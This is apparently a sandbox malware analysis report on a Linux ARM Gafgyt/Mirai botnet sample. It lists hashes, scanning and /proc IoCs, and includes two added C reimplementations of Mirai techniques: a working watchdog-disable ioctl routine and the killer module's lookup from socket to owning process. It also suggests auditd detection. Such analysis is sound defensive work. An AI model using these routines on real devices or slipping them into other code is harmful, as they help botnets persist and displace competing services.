Analysis
max time kernel: 152s
max time network: 154s
platform: linux_armhf
resource: debian9-armhf-en-20211208
resource tags: arch:armhf, image:debian9-armhf-en-20211208, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 30-04-2023 03:27

General
Target: SecuriteInfo.com.Gen.Variant.Trojan.Linux.Gafgyt.8.30058.6070.elf
Size: 51KB
MD5: b03e2150d6fc9c256b4fad1f644ba3fb
SHA1: 65466e5cd9cc1f3dbb0f47354258d6bea8f907de
SHA256: da56797ce94edb327d27a38350f1ac81edc00e755c423064464c07d1c58f564c
SHA512: f34ed32cf261e800e61388eea43d8721139356b47763defb06b6f2956650af0553d0e4e467610d615772432789c3a827f077e36305374795dd8aef2817251a21
SSDEEP: 768:Jc5/VxsZBk6vdoxs3cEWkui8FTAI27PvbhTsr9iOFfyPGKX9q3UELah/dKZ5JF6e:u/VxOBRB3c5kumDza5iOp1LoKWl/giED
Malware Config
Extracted
mirai
UNST
Note: the config extractor identifies the sample as mirai, while the vendor detection name in the target filename says Gafgyt. The two families share a large amount of code (the scanner and process-killing logic in particular), so a Mirai config match on a Gafgyt-labelled sample is common and does not by itself mean either label is wrong.
Signatures
Contacts a large number (57733) of remote hosts (1 TTP)
This may indicate a network scan to discover remotely running services.

Creates a large number of network flows (1 TTP)
This may indicate a network scan to discover remotely running services.

Modifies the Watchdog daemon (1 TTP)
Malware like Mirai modifies the watchdog to prevent it from restarting an infected system (a reboot would clear a memory-only infection).
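What "Modifies the Watchdog daemon" means at the syscall level, as an added example written for this page and not code recovered from the sample: the sequence below is the one in the leaked Mirai source (main.c), which opens /dev/watchdog or /dev/misc/watchdog read/write and sends WDIOC_SETOPTIONS with WDIOS_DISABLECARD (ioctl request 0x80045704, argument value 1), so a hardware watchdog that is no longer being fed does not reboot the device. The ioctl numbers are rebuilt from the Linux _IOC encoding instead of taken from <linux/watchdog.h> so that the values are visible; wdioc_name() is this example's own helper for reading request numbers in an strace or auditd record. That this particular sample uses exactly this sequence is an assumption; the report only states that the watchdog is modified.

```c
/* Added example (not the sample's code): Mirai's watchdog-disable sequence and
 * the ioctl numbers it uses, reconstructed from the Linux _IOC encoding. */
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define WDIOS_DISABLECARD 0x0001  /* as in <linux/watchdog.h>: turn the timer off */

/* Generic Linux _IOC layout (used on ARM and x86): dir<<30 | size<<16 | type<<8 | nr.
 * dir: 1 = _IOC_WRITE, 2 = _IOC_READ, 3 = both. */
unsigned long linux_ioc(unsigned dir, unsigned type, unsigned nr, unsigned size)
{
    return ((unsigned long)dir << 30) | ((unsigned long)size << 16) |
           ((unsigned long)type << 8) | nr;
}

/* WDIOC_SETOPTIONS = _IOR('W', 4, int) = 0x80045704, the constant Mirai hardcodes. */
unsigned long wdioc_setoptions(void)
{
    return linux_ioc(2, 'W', 4, sizeof(int));
}

/* Name the watchdog ioctls an analyst is likely to meet in a syscall trace. */
const char *wdioc_name(unsigned long req)
{
    if (req == linux_ioc(2, 'W', 4, sizeof(int))) return "WDIOC_SETOPTIONS";
    if (req == linux_ioc(2, 'W', 5, sizeof(int))) return "WDIOC_KEEPALIVE";
    if (req == linux_ioc(3, 'W', 6, sizeof(int))) return "WDIOC_SETTIMEOUT";
    return "unknown";
}

/* The Mirai sequence: open either device node O_RDWR, SETOPTIONS with
 * DISABLECARD, close. Returns 1 if a watchdog was found and the ioctl
 * succeeded, 0 if no device node exists, -1 if the ioctl failed.
 * CAUTION: on a kernel built with CONFIG_WATCHDOG_NOWAYOUT the close() cannot
 * stop the timer and the machine will reboot when it expires. Never run this
 * outside a throwaway VM. */
int mirai_disable_watchdog(void)
{
    static const char *nodes[] = { "/dev/watchdog", "/dev/misc/watchdog" };
    int i;
    for (i = 0; i < 2; i++) {
        int one = WDIOS_DISABLECARD, rc;
        int fd = open(nodes[i], O_RDWR);
        if (fd < 0)
            continue;
        rc = ioctl(fd, wdioc_setoptions(), &one);
        close(fd);
        return rc == 0 ? 1 : -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    printf("WDIOC_SETOPTIONS = 0x%lx (%s)\n", wdioc_setoptions(),
           wdioc_name(wdioc_setoptions()));
    /* Only touch the device when explicitly asked to. */
    if (argc > 1 && strcmp(argv[1], "--disable") == 0)
        printf("disable_watchdog -> %d\n", mirai_disable_watchdog());
    return 0;
}
```

Without `--disable` the program only prints the request number. For detection on a real device, an auditd watch on the node (`auditctl -w /dev/watchdog -p w -k watchdog`) records the write-mode open, and an ioctl with request 0x80045704 from anything other than the system's own watchdog daemon is the tell.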
Enumerates active TCP sockets (1 TTP, 2 IoCs)
Gets active TCP sockets from the /proc virtual filesystem.
Process: SecuriteInfo.com.Gen.Variant.Trojan.Linux.Gafgyt.8.30058.6070.elf
description | ioc
File opened for reading | /proc/net/tcp
File opened for reading | /proc/net/tcp

Reads system network configuration (1 TTP, 2 IoCs)
Uses contents of the /proc filesystem to enumerate network settings.
Process: SecuriteInfo.com.Gen.Variant.Trojan.Linux.Gafgyt.8.30058.6070.elf
description | ioc
File opened for reading | /proc/net/tcp
File opened for reading | /proc/net/tcp

Reads runtime system information (22 IoCs)
Reads data from the /proc virtual filesystem.
Process: SecuriteInfo.com.Gen.Variant.Trojan.Linux.Gafgyt.8.30058.6070.elf
description | ioc
File opened for reading | /proc/228/fd
File opened for reading | /proc/306/fd
File opened for reading | /proc/301/fd
File opened for reading | /proc/344/fd
File opened for reading | /proc/350/fd
File opened for reading | /proc/364/exe
File opened for reading | /proc/1/fd
File opened for reading | /proc/225/fd
File opened for reading | /proc/233/fd
File opened for reading | /proc/275/fd
File opened for reading | /proc/356/fd
File opened for reading | /proc/207/fd
File opened for reading | /proc/230/fd
File opened for reading | /proc/271/fd
File opened for reading | /proc/285/fd
File opened for reading | /proc/304/fd
File opened for reading | /proc/307/fd
File opened for reading | /proc/352/fd
File opened for reading | /proc/self/exe
File opened for reading | /proc/131/fd
File opened for reading | /proc/164/fd
File opened for reading | /proc/276/fd
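The three /proc signatures above (a read of /proc/net/tcp, then a sweep of /proc/<pid>/fd and a readlink of /proc/<pid>/exe and /proc/self/exe) are the footprint of the process-hunting routine known from the leaked Mirai source (its "killer" module): find whatever is listening on a port such as 23, map the socket to its owning pid, make sure that pid is not the bot itself, and kill it. The C program below is an added example written for this page, not code recovered from the sample or produced by the sandbox; it reimplements that lookup chain on a constructed /proc/net/tcp table so the IoC list can be read as steps. The sample rows, the function and constant names (parse_tcp_line, listener_inode_on_port, socket_inode_from_link, pid_owning_socket, SAMPLE_PROC_NET_TCP) and the little-endian decoding assumption are this example's own, and that this sample follows Mirai's killer exactly is an inference from the signatures, not something the report shows.

```c
/* Added example (not the sample's code): the /proc/net/tcp -> socket inode ->
 * /proc/<pid>/fd lookup chain behind the IoCs above. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <dirent.h>
#include <unistd.h>
#include <sys/types.h>

#define TCP_STATE_LISTEN 0x0A  /* value of the "st" column for LISTEN */

struct tcp_entry {
    char local[16];        /* dotted-quad local address */
    unsigned short lport;  /* local port, host order */
    unsigned st;           /* socket state, 0x0A = LISTEN */
    unsigned long inode;   /* socket inode; /proc/<pid>/fd/N -> "socket:[inode]" */
};

/* Constructed sample table (not captured from the sandbox). Row 0: telnet
 * listener, inode 1234. Row 1: HTTP listener, inode 5678. Rows 2/3: the two
 * ends of an ESTABLISHED (st = 01) loopback connection to port 80. */
static const char SAMPLE_PROC_NET_TCP[] =
"  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
"   0: 00000000:0017 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0\n"
"   1: 0100007F:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5678 1 0000000000000000 100 0 0 10 0\n"
"   2: 0100007F:8BA4 0100007F:0050 01 00000000:00000000 00:00000000 00000000  1000        0 9012 1 0000000000000000 20 4 30 10 -1\n"
"   3: 0100007F:0050 0100007F:8BA4 01 00000000:00000000 00:00000000 00000000     0        0 9013 1 0000000000000000 20 4 30 10 -1\n";

/* Parse one /proc/net/tcp row; returns 1 on success, 0 for the header line.
 * The kernel prints the IPv4 address as the raw in_addr in host byte order,
 * so on little-endian hosts (armhf, x86) 127.0.0.1 appears as 0100007F. This
 * decoder assumes a little-endian source, like the sandbox's armhf image. */
int parse_tcp_line(const char *line, struct tcp_entry *e)
{
    unsigned sl, laddr, lport, raddr, rport, st;
    unsigned long inode;
    if (sscanf(line, " %u: %8x:%4x %8x:%4x %2x %*x:%*x %*x:%*x %*x %*u %*u %lu",
               &sl, &laddr, &lport, &raddr, &rport, &st, &inode) != 7)
        return 0;
    snprintf(e->local, sizeof e->local, "%u.%u.%u.%u", laddr & 0xff,
             (laddr >> 8) & 0xff, (laddr >> 16) & 0xff, (laddr >> 24) & 0xff);
    e->lport = (unsigned short)lport;
    e->st = st;
    e->inode = inode;
    return 1;
}

/* Inode of the first socket LISTENing on `port`, or 0. Rows in other states on
 * the same port are skipped: they are connections, not the service itself. */
unsigned long listener_inode_on_port(const char *text, unsigned short port)
{
    const char *p = text;
    struct tcp_entry e;
    while (p && *p) {
        if (parse_tcp_line(p, &e) && e.st == TCP_STATE_LISTEN && e.lport == port)
            return e.inode;
        p = strchr(p, '\n');
        if (p) p++;
    }
    return 0;
}

/* Decode a readlink() target such as "socket:[5678]"; 0 for anything else. */
unsigned long socket_inode_from_link(const char *target)
{
    unsigned long inode = 0;
    return sscanf(target, "socket:[%lu]", &inode) == 1 ? inode : 0;
}

/* Live step: scan /proc/<pid>/fd of every process for a link to the socket
 * inode and return the owning pid, or 0. This sweep is what produces the long
 * run of "/proc/<pid>/fd" reads in the IoC list. */
pid_t pid_owning_socket(unsigned long inode)
{
    DIR *proc = opendir("/proc"), *fds;
    struct dirent *d, *f;
    char path[64], target[64];
    ssize_t n;
    if (!proc) return 0;
    while ((d = readdir(proc)) != NULL) {
        if (!isdigit((unsigned char)d->d_name[0])) continue;   /* not a pid */
        snprintf(path, sizeof path, "/proc/%s/fd", d->d_name);
        if ((fds = opendir(path)) == NULL) continue;            /* EACCES: skip */
        while ((f = readdir(fds)) != NULL) {
            snprintf(path, sizeof path, "/proc/%s/fd/%s", d->d_name, f->d_name);
            if ((n = readlink(path, target, sizeof target - 1)) < 0) continue;
            target[n] = '\0';
            if (socket_inode_from_link(target) == inode) {
                closedir(fds); closedir(proc);
                return (pid_t)atoi(d->d_name);
            }
        }
        closedir(fds);
    }
    closedir(proc);
    return 0;
}

int main(void)
{
    unsigned long ino = listener_inode_on_port(SAMPLE_PROC_NET_TCP, 23);
    printf("LISTEN on :23 -> socket inode %lu\n", ino);
    /* On a live host the bot continues with pid_owning_socket(ino), compares
     * readlink("/proc/<pid>/exe") with readlink("/proc/self/exe") so it does
     * not kill itself, then kill(pid, SIGKILL). */
    return 0;
}
```

The offline part (the table parser and the LISTEN filter) is what the test exercises; pid_owning_socket() needs a real /proc. For detection, the ordering is the signal rather than any single file: one process reads /proc/net/tcp and then opens /proc/<pid>/fd for a dozen or more pids within a second, exactly the pattern the IoC list records.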
Processes
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
memory/351-1-0x00008000-0x0002ad10-memory.dmp